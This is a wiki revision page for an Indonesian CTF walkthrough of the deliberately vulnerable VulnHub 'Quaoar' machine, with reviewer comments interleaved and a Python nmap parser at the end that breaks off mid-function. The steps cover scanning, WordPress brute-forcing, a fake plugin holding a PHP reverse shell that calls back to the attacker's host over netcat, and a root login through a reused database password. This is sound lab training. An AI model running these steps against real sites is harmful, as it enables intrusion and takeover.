Difference between revisions of "CTF Quaoar: Walkthrough"
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
(24 intermediate revisions by the same user not shown) | |||
Line 2: | Line 2: | ||
* https://www.vulnhub.com/entry/hackfest2016-quaoar,180/#download | * https://www.vulnhub.com/entry/hackfest2016-quaoar,180/#download | ||
− | * Install OVA di | + | * Install OVA di VirtualBox |
* Jalankan, ada clue di page depan Quaoar saat jalan. | * Jalankan, ada clue di page depan Quaoar saat jalan. | ||
* Difficulty Level: Very Easy | * Difficulty Level: Very Easy | ||
+ | |||
+ | Here are the tools you can research to help you to own this machine. nmap dirb / dirbuster / BurpSmartBuster nikto wpscan hydra + Your Brain Coffee Google 🙂 | ||
+ | |||
+ | Goals: This machine is intended to be doable by someone who is interested in learning computer security There are 3 flags on this machine | ||
+ | # Get a shell | ||
+ | # Get root access | ||
+ | # There is a post exploitation flag on the box | ||
+ | |||
+ | |||
==Cek Mesin== | ==Cek Mesin== | ||
Line 19: | Line 28: | ||
----------------------------------------------------------------------------- | ----------------------------------------------------------------------------- | ||
..... | ..... | ||
− | 192.168.0.122 08:00:27:b2:18:3a 1 60 PCS Systemtechnik GmbH | + | 192.168.0.122 08:00:27:b2:18:3a 1 60 PCS Systemtechnik GmbH |
− | ..... | + | ...... |
Scan Quaoar | Scan Quaoar | ||
+ | sudo su | ||
nmap -v -A 192.168.0.122 | nmap -v -A 192.168.0.122 | ||
+ | nmap -p1-65535 -A -T4 -sS 192.168.0.122 | ||
+ | |||
− | Starting Nmap 7.92 ( https://nmap.org ) at 2023-01- | + | Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-26 20:28 EST |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
Nmap scan report for 192.168.0.122 | Nmap scan report for 192.168.0.122 | ||
− | Host is up (0. | + | Host is up (0.0011s latency). |
− | Not shown: | + | Not shown: 65526 closed tcp ports (reset) |
− | PORT STATE SERVICE | + | PORT STATE SERVICE VERSION |
− | 22/tcp open ssh | + | 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol |
+ | 2.0) | ||
| ssh-hostkey: | | ssh-hostkey: | ||
| 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA) | | 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA) | ||
| 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA) | | 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA) | ||
|_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA) | |_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA) | ||
− | 53/tcp open domain | + | 53/tcp open domain ISC BIND 9.8.1-P1 |
| dns-nsid: | | dns-nsid: | ||
|_ bind.version: 9.8.1-P1 | |_ bind.version: 9.8.1-P1 | ||
− | 80/tcp open http | + | 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |
+ | |_http-server-header: Apache/2.2.22 (Ubuntu) | ||
+ | |_http-title: Site doesn't have a title (text/html). | ||
| http-robots.txt: 1 disallowed entry | | http-robots.txt: 1 disallowed entry | ||
|_Hackers | |_Hackers | ||
− | |||
− | |||
− | |||
− | |||
110/tcp open pop3? | 110/tcp open pop3? | ||
− | |_pop3-capabilities: RESP-CODES | + | |_pop3-capabilities: RESP-CODES TOP UIDL SASL CAPA STLS PIPELINING |
− | |||
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | ||
− | |||
− | |||
− | |||
− | |||
| Not valid before: 2016-10-07T04:32:43 | | Not valid before: 2016-10-07T04:32:43 | ||
− | | | + | |_Not valid after: 2026-10-07T04:32:43 |
− | | | + | |_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time. |
− | + | 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) | |
− | 143/tcp open imap | + | 143/tcp open imap Dovecot imapd |
+ | |_sslv2: ERROR: Script execution failed (use -d to debug) | ||
+ | |_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time. | ||
+ | |_imap-capabilities: more STARTTLS ENABLE post-login LITERAL+ listed capabilities | ||
+ | Pre-login have IDLE ID OK LOGINDISABLEDA0001 SASL-IR IMAP4rev1 LOGIN-REFERRALS | ||
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | ||
− | |||
− | |||
− | |||
− | |||
| Not valid before: 2016-10-07T04:32:43 | | Not valid before: 2016-10-07T04:32:43 | ||
− | | | + | |_Not valid after: 2026-10-07T04:32:43 |
− | + | 445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP) | |
− | + | 993/tcp open ssl/imap Dovecot imapd | |
− | + | |_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time. | |
− | 993/tcp open ssl/imap | ||
− | |_ssl-date: 2023-01- | ||
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | ||
− | |||
− | |||
− | |||
− | |||
| Not valid before: 2016-10-07T04:32:43 | | Not valid before: 2016-10-07T04:32:43 | ||
− | | | + | |_Not valid after: 2026-10-07T04:32:43 |
− | |||
− | |||
995/tcp open ssl/pop3s? | 995/tcp open ssl/pop3s? | ||
− | |_ssl-date: 2023-01- | + | |_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time. |
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | ||
− | |||
− | |||
− | |||
− | |||
| Not valid before: 2016-10-07T04:32:43 | | Not valid before: 2016-10-07T04:32:43 | ||
− | | | + | |_Not valid after: 2026-10-07T04:32:43 |
− | |||
− | |||
MAC Address: 08:00:27:B2:18:3A (Oracle VirtualBox virtual NIC) | MAC Address: 08:00:27:B2:18:3A (Oracle VirtualBox virtual NIC) | ||
Device type: general purpose | Device type: general purpose | ||
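Review bot: two scan commands are now listed (nmap -v -A, then nmap -p1-65535 -A -T4 -sS) but only one output follows them, and "Not shown: 65526 closed tcp ports" shows it came from the full-range -p1-65535 run; either drop the first command or say which output belongs to which. The added "sudo su" line also deserves one sentence of explanation: -sS and the OS detection in -A need raw sockets, so the scan has to run as root.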
Line 130: | Line 88: | ||
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 | OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 | ||
OS details: Linux 2.6.32 - 3.5 | OS details: Linux 2.6.32 - 3.5 | ||
− | |||
Network Distance: 1 hop | Network Distance: 1 hop | ||
− | + | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel | |
− | + | ||
− | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel | + | Host script results: |
+ | |_smb2-time: Protocol negotiation failed (SMB2) | ||
+ | |_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> | ||
+ | (unknown) | ||
+ | | smb-security-mode: | ||
+ | | account_used: guest | ||
+ | | authentication_level: user | ||
+ | | challenge_response: supported | ||
+ | |_ message_signing: disabled (dangerous, but default) | ||
+ | | smb-os-discovery: | ||
+ | | OS: Unix (Samba 3.6.3) | ||
+ | | NetBIOS computer name: | ||
+ | | Workgroup: WORKGROUP\x00 | ||
+ | |_ System time: 2023-01-26T20:31:31-05:00 | ||
+ | |_clock-skew: mean: 50m00s, deviation: 2h02m28s, median: 0s | ||
TRACEROUTE | TRACEROUTE | ||
HOP RTT ADDRESS | HOP RTT ADDRESS | ||
− | 1 | + | 1 1.06 ms 192.168.0.122 |
− | + | OS and Service detection performed. Please report any incorrect results at | |
− | + | https://nmap.org/submit/ . | |
− | + | Nmap done: 1 IP address (1 host up) scanned in 197.36 seconds | |
− | + | ||
− | + | ||
− | + | Service yang di temukan, | |
− | + | ||
− | + | Port Service Product | |
− | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | + | 22 ssh OpenSSH |
− | Nmap done: 1 IP address (1 host up) scanned in | + | 53 domain ISC BIND |
− | + | 80 http Apache httpd | |
+ | 110 pop3 | ||
+ | 139 netbios-ssn Samba smbd | ||
+ | 143 imap Dovecot imapd | ||
+ | 445 netbios-ssn Samba smbd | ||
+ | 993 imap Dovecot imapd | ||
+ | 995 pop3s | ||
+ | |||
+ | Beberapa informasi menarik dari berbagai servis | ||
+ | |||
+ | ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0 | ||
+ | domain bind.version: 9.8.1-P1 | ||
+ | http folder Hackers, robots.txt | ||
+ | pop3 dovecot pop3d supporting SASL TOP PIPELINING UIDL RESP-CODES STLS CAPA | ||
+ | netbios workgroup: WORKGROUP | ||
+ | imap post-login ID OK IMAP4rev1 LITERAL+ listed STARTTLS | ||
Tampaknya yang mungkin menarik untuk di exploit adalah port web 80. | Tampaknya yang mungkin menarik untuk di exploit adalah port web 80. | ||
− | ==Pakai dirb== | + | ==Berburu Flag 1: Web== |
+ | |||
+ | ===Pakai dirb=== | ||
Lakukan, | Lakukan, | ||
dirb http://192.168.0.122 | dirb http://192.168.0.122 | ||
+ | dirb http://192.168.0.122 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w | ||
Hasilnya | Hasilnya | ||
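Review bot: in the "Beberapa informasi menarik" list the ssh line lost its closing parenthesis: "ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0" should end with ")". The summary also skips two host-script findings that matter more than the IMAP capability list, "message_signing: disabled (dangerous, but default)" and the exact Samba version 3.6.3 on 445/tcp; add both rows so the table reflects what the scan actually exposed.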
Line 648: | Line 637: | ||
DOWNLOADED: 258272 - FOUND: 252 | DOWNLOADED: 258272 - FOUND: 252 | ||
+ | Coba, | ||
+ | |||
+ | dirb http://192.168.0.122 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w | ||
+ | |||
+ | Hasilny tidak beda jauh dengan sebelumnya. | ||
+ | Sepertinya ada CMS (Lepton CMS) yang mengintai target ini. | ||
Disini bisa dilihat terdapat 3 file/folder penting yaitu | Disini bisa dilihat terdapat 3 file/folder penting yaitu | ||
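Review bot: "Hasilny" in the added sentence is a typo for "Hasilnya". The second dirb run with big.txt repeats the command already shown above and is said to give nearly the same result; one run plus a short note that big.txt added nothing new would read more clearly than two copies of the command.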
Line 675: | Line 670: | ||
Ada LEPTON CMS, tapi sulit untuk diakses karena menggunakan IP 192.168.0.190. | Ada LEPTON CMS, tapi sulit untuk diakses karena menggunakan IP 192.168.0.190. | ||
+ | Tampaknya kita lebih baik focus ke wordpress saja. | ||
− | ==Wordpress Scanning== | + | ===Wordpress Scanning=== |
Scan Wordpress, | Scan Wordpress, | ||
Line 784: | Line 780: | ||
[+] Elapsed time: 00:00:05 | [+] Elapsed time: 00:00:05 | ||
− | ==Wordpress Bruteforce password== | + | |
+ | |||
+ | Yang di temukan, | ||
+ | |||
+ | What Fact | ||
+ | /readme.html WordPress version 3.9.14 | ||
+ | /wp-content/uploads/ Upload directory has directory listing enabled | ||
+ | |||
+ | Di temukan user, | ||
+ | |||
+ | Id Login Name | ||
+ | 1 admin admin | ||
+ | 2 wpuser wpuser | ||
+ | |||
+ | ===Wordpress Bruteforce password=== | ||
Coba bruteforce, | Coba bruteforce, | ||
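Review bot: the "What Fact" table records "Upload directory has directory listing enabled" for /wp-content/uploads/ but nothing later uses or explains it; either say why it matters (anyone can browse every file that was ever uploaded, which is a finding on its own) or drop the row. The WordPress version 3.9.14 from /readme.html is the detail that decides the rest of the write-up and should be called out as such.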
Line 820: | Line 830: | ||
password admin | password admin | ||
− | ==Inject cmd vulnerability== | + | ===Inject cmd vulnerability=== |
Coba login ke | Coba login ke | ||
Line 900: | Line 910: | ||
uid=33(www-data) gid=33(www-data) groups=33(www-data) | uid=33(www-data) gid=33(www-data) groups=33(www-data) | ||
+ | ===Alternative Inject Fake Plugin=== | ||
+ | |||
+ | Di Kali Linux | ||
+ | |||
+ | cd ~ | ||
+ | cp /usr/share/webshells/php/php-reverse-shell.php ~/shelly.php | ||
+ | |||
+ | Beri plugin wrapper | ||
+ | |||
+ | <?php | ||
+ | |||
+ | /* | ||
+ | Plugin Name: Shelly | ||
+ | Plugin URI: http://localhost | ||
+ | Description: Bla Bla Bla | ||
+ | Author: Pingmoose | ||
+ | Version: 1.0.1 | ||
+ | Author URI: http://localhost | ||
+ | */ | ||
+ | |||
+ | COPY CONTENTS OF shelly.php HERE | ||
+ | |||
+ | ?> | ||
+ | |||
+ | |||
+ | Masuk ke shell Kali, cek IP address | ||
+ | |||
+ | ifconfig eth0 | ||
+ | |||
+ | Misalnya, IP address 192.168.0.94 | ||
+ | Edit shelly shell ubah, | ||
+ | |||
+ | $ip = '127.0.0.1'; // CHANGE THIS | ||
+ | $port = 1234; // CHANGE THIS | ||
+ | |||
+ | Menjadi | ||
+ | |||
+ | $ip = '192.168.0.94'; // CHANGE THIS | ||
+ | $port = 4444; // CHANGE THIS | ||
− | ==Start netcat listener di Kali== | + | |
+ | Zip, | ||
+ | |||
+ | zip shelly-plugin.zip shelly.php | ||
+ | mv shelly-plugin.zip /home/kali | ||
+ | chmod -Rf 777 /home/kali/shelly-plugin.zip | ||
+ | chown kali: /home/kali/shelly-plugin.zip | ||
+ | |||
+ | Masuk ke | ||
+ | |||
+ | http://192.168.0.122/wordpress/wp-admin/plugins.php | ||
+ | |||
+ | Upload, JANGAN di aktifkan | ||
+ | |||
+ | ===Start netcat listener di Kali=== | ||
Start 4444 listener | Start 4444 listener | ||
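Review bot: "chmod -Rf 777 /home/kali/shelly-plugin.zip" grants world write on the archive for no reason; the "chown kali:" on the next line is all the browser upload needs, so drop the chmod. The PHP stub is also ambiguous: it opens with "<?php", ends with "?>" and says "COPY CONTENTS OF shelly.php HERE", while the later steps edit "$ip" and "$port" inside shelly.php itself; state plainly that the header comment block is pasted at the top of shelly.php, not that shelly.php is pasted into this stub, or readers will end up with a second "<?php" tag inside the file.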
Line 907: | Line 970: | ||
nc -nvlp 4444 | nc -nvlp 4444 | ||
− | + | Aktifkan shelly shell | |
+ | |||
+ | http://192.168.0.122/wordpress/wp-content/plugins/shelly-plugin/shelly.php | ||
+ | |||
+ | Di kali linux CLI akan ada kata2, | ||
+ | |||
+ | nc -nvlp 4444 | ||
+ | listening on [any] 4444 ... | ||
+ | connect to [192.168.0.94] from (UNKNOWN) [192.168.0.122] 48071 | ||
+ | Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux | ||
+ | 21:23:43 up 1:10, 0 users, load average: 0.00, 0.01, 0.07 | ||
+ | USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT | ||
+ | uid=33(www-data) gid=33(www-data) groups=33(www-data) | ||
+ | /bin/sh: 0: can't access tty; job control turned off | ||
+ | $ | ||
+ | |||
+ | Akses shell yang lebih dalam, | ||
+ | |||
+ | $ whoami | ||
+ | www-data | ||
+ | $ whereis python | ||
+ | python: /usr/bin/python2.7 /usr/bin/python /etc/python2.7 /etc/python /usr/lib/python2.7 /usr/local/lib/python2.7 /usr/include/python2.7 /usr/share/python /usr/share/man/man1/python.1.gz | ||
+ | $ python -c 'import pty; pty.spawn("/bin/bash")' | ||
+ | www-data@Quaoar:/$ | ||
− | + | Dapatkan flag yang pertama, | |
− | |||
− | + | www-data@Quaoar:/$ cd /home | |
+ | cd /home | ||
+ | www-data@Quaoar:/home$ ls | ||
+ | ls | ||
+ | wpadmin | ||
+ | www-data@Quaoar:/home$ cat wpadmin | ||
+ | cat wpadmin | ||
+ | cat: wpadmin: Is a directory | ||
+ | www-data@Quaoar:/home$ cd wpadmin | ||
+ | cd wpadmin | ||
+ | www-data@Quaoar:/home/wpadmin$ ls | ||
+ | ls | ||
+ | flag.txt | ||
+ | www-data@Quaoar:/home/wpadmin$ cat flag.txt | ||
+ | cat flag.txt | ||
+ | 2bafe61f03117ac66a73c3c514de796e | ||
+ | www-data@Quaoar:/home/wpadmin$ | ||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
+ | ==Berburu Flag 2: Root== | ||
+ | Cek, | ||
+ | |||
+ | cd / | ||
+ | find / -perm -4000 -user root 2> /dev/null | ||
+ | |||
+ | Tampaknya tidak ada yang terlalu menarik. | ||
+ | Cek wp-config.php, | ||
+ | |||
+ | cat /var/www/wordpress/wp-config.php | ||
+ | |||
+ | Hasilnya, | ||
+ | |||
+ | ..... | ||
+ | /** The name of the database for WordPress */ | ||
+ | define('DB_NAME', 'wordpress'); | ||
+ | |||
+ | /** MySQL database username */ | ||
+ | define('DB_USER', 'root'); | ||
+ | |||
+ | /** MySQL database password */ | ||
+ | define('DB_PASSWORD', 'rootpassword!'); | ||
+ | |||
+ | /** MySQL hostname */ | ||
+ | define('DB_HOST', 'localhost'); | ||
+ | |||
+ | /** Database Charset to use in creating database tables. */ | ||
+ | define('DB_CHARSET', 'utf8'); | ||
+ | |||
+ | /** The Database Collate type. Don't change this if in doubt. */ | ||
+ | define('DB_COLLATE', ''); | ||
+ | ..... | ||
+ | |||
+ | DB_PASSWORD rootpassword! - Keren! | ||
+ | Jajal, | ||
+ | ww-data@Quaoar:/$ su | ||
+ | su | ||
+ | Password: rootpassword! | ||
+ | root@Quaoar:/# | ||
+ | |||
+ | Masuk :) .. | ||
+ | Root Flag | ||
+ | |||
+ | root@Quaoar:/# cd /root | ||
+ | cd /root | ||
+ | root@Quaoar:~# ls -al | ||
+ | ls -al | ||
+ | total 48 | ||
+ | drwx------ 6 root root 4096 Nov 30 2016 . | ||
+ | drwxr-xr-x 22 root root 4096 Oct 7 2016 .. | ||
+ | drwx------ 2 root root 4096 Oct 7 2016 .aptitude | ||
+ | -rw------- 1 root root 410 Jan 24 04:38 .bash_history | ||
+ | -rw-r--r-- 1 root root 3106 Apr 19 2012 .bashrc | ||
+ | drwx------ 2 root root 4096 Oct 15 2016 .cache | ||
+ | ---------- 1 root root 33 Oct 22 2016 flag.txt | ||
+ | -rw-r--r-- 1 root root 140 Apr 19 2012 .profile | ||
+ | drwx------ 2 root root 4096 Oct 26 2016 .ssh | ||
+ | -rw------- 1 root root 4740 Nov 30 2016 .viminfo | ||
+ | drwxr-xr-x 8 root root 4096 Jan 29 2015 vmware-tools-distrib | ||
+ | root@Quaoar:~# cat flag.txt | ||
+ | cat flag.txt | ||
+ | 8e3f9ec016e3598c5eec11fd3d73f6fb | ||
+ | root@Quaoar:~# | ||
+ | Flag root adalah | ||
− | + | 8e3f9ec016e3598c5eec11fd3d73f6fb | |
− | + | ==Berburu Flag 3: Root== | |
− | |||
− | |||
− | |||
− | + | Cek /etc | |
− | + | Tampaknya /etc/cron.d/php5 menarik, | |
− | + | Lakukan, | |
− | + | root@Quaoar:~# cd /etc | |
− | + | cd /etc | |
− | + | root@Quaoar:/etc# ls *cron* | |
− | + | ls *cron* | |
− | + | crontab | |
− | + | ||
+ | cron.d: | ||
+ | php5 | ||
+ | |||
+ | cron.daily: | ||
+ | apache2 bsdmainutils man-db samba | ||
+ | apport dpkg mlocate standard | ||
+ | apt libvirt-bin passwd tomcat6 | ||
+ | aptitude logrotate popularity-contest update-notifier-common | ||
+ | |||
+ | cron.hourly: | ||
+ | |||
+ | cron.monthly: | ||
+ | |||
+ | cron.weekly: | ||
+ | apt-xapian-index man-db | ||
+ | root@Quaoar:/etc# cat cron.d/php5 | ||
+ | cat cron.d/php5 | ||
+ | # /etc/cron.d/php5: crontab fragment for php5 | ||
+ | # This purges session files older than X, where X is defined in seconds | ||
+ | # as the largest value of session.gc_maxlifetime from all your php.ini | ||
+ | # files, or 24 minutes if not defined. See /usr/lib/php5/maxlifetime | ||
+ | # Its always a good idea to check for crontab to learn more about the operating | ||
+ | system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de | ||
+ | # Look for and purge old sessions every 30 minutes | ||
+ | 09,39 * * * * root [ -x /usr/lib/php5/maxlifetime ] && [ -d | ||
+ | /var/lib/php5 ] && find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin +$(/usr/lib/php5/maxlifetime) ! -execdir fuser -s {} 2>/dev/null \; -delete | ||
+ | root@Quaoar:/etc# | ||
+ | Flag Root adalah, | ||
− | + | d46795f84148fd338603d0d6a9dbf8de | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | ==Beberapa Catatan Percobaan Sebelumnya== | |
− | ==Privilege Escalation (getting root)== | + | ==Percobaan Privilege Escalation (getting root)== |
cara-cara di atas semua tidak berhasil. | cara-cara di atas semua tidak berhasil. |
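Review bot: the headings "Berburu Flag 2: Root" and "Berburu Flag 3: Root" are identical apart from the number, while the machine's goals list the third flag as the post-exploitation flag, here found in /etc/cron.d/php5; rename the third heading to say so. The su step should also state its lesson explicitly: it works only because the MySQL password in wp-config.php ("rootpassword!") is reused as the system root password, so the fix on a real host is separate credentials for the database and the OS account. Typo: "ww-data@Quaoar:/$ su" should read "www-data@Quaoar:/$ su".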
Latest revision as of 20:53, 21 August 2023
Get Quaoar from Vulnhub
- https://www.vulnhub.com/entry/hackfest2016-quaoar,180/#download
- Install the OVA in VirtualBox
- Run it; there is a clue on Quaoar's front page when it boots.
- Difficulty Level: Very Easy
Here are the tools you can research to help you to own this machine:
- nmap
- dirb / dirbuster / BurpSmartBuster
- nikto
- wpscan
- hydra
- + Your Brain
- Coffee
- Google 🙂
Goals: This machine is intended to be doable by someone who is interested in learning computer security. There are 3 flags on this machine:
- Get a shell
- Get root access
- There is a post exploitation flag on the box
Check the Machine
Use
netdiscover -r 192.168.0.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts

21 Captured ARP Req/Rep packets, from 20 hosts.   Total size: 1260
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
.....
192.168.0.122   08:00:27:b2:18:3a      1      60  PCS Systemtechnik GmbH
......
Scan Quaoar
sudo su
nmap -v -A 192.168.0.122
nmap -p1-65535 -A -T4 -sS 192.168.0.122
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-26 20:28 EST
Nmap scan report for 192.168.0.122
Host is up (0.0011s latency).
Not shown: 65526 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain      ISC BIND 9.8.1-P1
| dns-nsid:
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_Hackers
110/tcp open  pop3?
|_pop3-capabilities: RESP-CODES TOP UIDL SASL CAPA STLS PIPELINING
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time.
|_imap-capabilities: more STARTTLS ENABLE post-login LITERAL+ listed capabilities Pre-login have IDLE ID OK LOGINDISABLEDA0001 SASL-IR IMAP4rev1 LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
|_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
995/tcp open  ssl/pop3s?
|_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
MAC Address: 08:00:27:B2:18:3A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Unix (Samba 3.6.3)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-01-26T20:31:31-05:00
|_clock-skew: mean: 50m00s, deviation: 2h02m28s, median: 0s

TRACEROUTE
HOP RTT     ADDRESS
1   1.06 ms 192.168.0.122

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 197.36 seconds
Services found:
Port  Service      Product
22    ssh          OpenSSH
53    domain       ISC BIND
80    http         Apache httpd
110   pop3
139   netbios-ssn  Samba smbd
143   imap         Dovecot imapd
445   netbios-ssn  Samba smbd
993   imap         Dovecot imapd
995   pop3s
Some interesting details from the various services:
ssh      OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
domain   bind.version: 9.8.1-P1
http     folder Hackers, robots.txt
pop3     dovecot pop3d supporting SASL TOP PIPELINING UIDL RESP-CODES STLS CAPA
netbios  workgroup: WORKGROUP
imap     post-login ID OK IMAP4rev1 LITERAL+ listed STARTTLS
The web port, 80, looks like the most interesting one to exploit.
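As an added example (not code from this walkthrough or from the Quaoar VM's author), the script below parses nmap's normal report into the Port / Service / Product table built by hand above and pulls out the NSE lines a defender would triage first. The embedded report excerpt is constructed from the scan shown above, and the product heuristic (the words before the first versioned token) is an assumption of this example, so it keeps nmap's ssl/ tunnel prefix where the hand-made table dropped it.

```python
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Constructed excerpt of the nmap 7.92 report shown above; sample input for this
# example only (a few NSE lines kept, the rest trimmed).
SAMPLE_NMAP = """\
Nmap scan report for 192.168.0.122
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      ISC BIND 9.8.1-P1
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
110/tcp open  pop3?
|_pop3-capabilities: RESP-CODES TOP UIDL SASL CAPA STLS PIPELINING
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
995/tcp open  ssl/pop3s?
MAC Address: 08:00:27:B2:18:3A (Oracle VirtualBox virtual NIC)
Host script results:
|_  message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str        # nmap service name; a trailing '?' marks an unconfirmed guess
    confirmed: bool
    version: str     # whole VERSION column as printed
    scripts: List[str] = field(default_factory=list)  # NSE output under this port

    @property
    def product(self) -> str:
        # Words before the first token with a digit: 'ISC BIND 9.8.1-P1' -> 'ISC BIND'.
        words = []
        for w in self.version.split():
            if any(ch.isdigit() for ch in w):
                break
            words.append(w)
        return " ".join(words)


@dataclass
class Report:
    host: str = ""
    services: List[Service] = field(default_factory=list)
    host_scripts: List[str] = field(default_factory=list)


def parse_nmap(text: str) -> Report:
    """Parse nmap's normal report into open ports and the NSE lines under each."""
    report, current, in_host = Report(), None, False
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("Nmap scan report for "):
            report.host = line.split()[-1]
        elif line.startswith("Host script results:"):
            in_host, current = True, None
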